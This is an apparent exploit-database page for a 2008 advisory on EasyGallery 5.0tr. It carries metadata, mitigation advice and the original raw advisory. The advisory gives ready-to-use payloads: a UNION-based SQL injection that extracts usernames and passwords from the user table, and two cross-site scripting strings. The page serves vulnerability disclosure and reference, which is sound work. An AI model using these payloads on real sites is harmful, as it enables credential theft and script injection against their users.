header-logo
Suggest Exploit
vendor:
EasyGallery
by:
JosS
7.5
CVSS
HIGH
Multiple Remote Vulnerabilities
89, 79, 80
CWE
Product Name: EasyGallery
Affected Version From: 5.0tr
Affected Version To: 5.0tr
Patch Exists: NO
Related CWE: N/A
CPE: a:myiosoft:easygallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

EasyGallery <= 5.0tr - Multiple Remote Vulnerabilities

EasyGallery 5.0tr is vulnerable to multiple remote vulnerabilities including SQL Injection, Cross Site Scripting in URI and Cross Site Scripting. An attacker can exploit these vulnerabilities to gain unauthorized access to the application and execute malicious code.

Mitigation:

Ensure that user input is validated and filtered properly. Use parameterized queries to prevent SQL Injection. Use a web application firewall to detect and block malicious requests.
Source

Exploit-DB raw data:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                EasyGallery <= 5.0tr - Multiple Remote Vulnerabilities              +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: EasyGallery
[~] HomePage: http://myiosoft.com
[~] Exploit: Multiple Remote Vulnerabilities [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Verified in localhost with EasyGallery 5.0tr and magic_quotes Off

[+] Remote SQL Injection:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?page=category&PageSection=0&catid=[SQL]
[~] Example: -1+union+all+select+1,2,3,concat(puUsername,char(54),puPassword),5,6,7,8,9,0,1+from+edp_puusers/*

[+] Cross Site Scripting in URI:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php/[XSS]
[~] Example: >"><ScRiPt>alert("JosS)</ScRiPt>

[+] Cross Site Scripting:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?help=about&q=[XSS]
[~] Example: %22+onmouseover=alert("JosS")+


--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-03-12]